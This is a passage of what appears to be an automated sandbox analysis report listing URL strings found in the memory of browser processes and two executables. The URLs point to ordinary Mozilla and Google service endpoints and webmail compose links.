Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000022.00000002.2927818940.00006DEC0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000022.00000002.2910946801.000027A000237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000022.00000003.2858643495.000027A0006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912413617.000027A000744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912637888.000027A00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2859206602.000027A0006E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000022.00000002.2912413617.000027A000744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: chrome.exe, 00000022.00000002.2998024266.00006DEC0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000002.2898025949.0000013966286000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F644DA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: chrome.exe, 00000022.00000002.2996028481.00006DEC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.3020042262.00006DEC00EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2881703204.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: chrome.exe, 00000022.00000002.2996028481.00006DEC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
